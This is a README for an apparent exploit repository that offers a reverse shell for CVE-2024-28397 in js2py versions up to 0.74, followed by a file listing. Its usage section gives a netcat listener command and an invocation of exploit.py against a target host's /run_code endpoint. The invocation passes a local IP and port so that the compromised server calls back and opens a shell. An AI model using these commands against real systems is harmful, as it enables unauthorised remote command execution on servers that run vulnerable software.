Reverse shell for CVE-2024-28397.# CVE-2024-28397-Reverse-Shell
Reverse shell for CVE-2024-28397.
Exploit works for js2py <= v0.74
## Requirements
- requests library (pip install requests)
- Python3
- Netcat (Or something that you can use as a listener for the reverse shell)
## Usage
##### For listener
```bash
nc -lnvp 4444
```
##### For exploit
```bash
python3 exploit.py 10.129.66.160 8000 /run_code --local_ip 10.10.15.11 --local_port 4444
```
[4.0K] /data/pocs/f698d4f4041d576eed6c3ce4e34e0e4b21709ea4
├── [1.7K] exploit.py
└── [ 423] README.md
1 directory, 2 files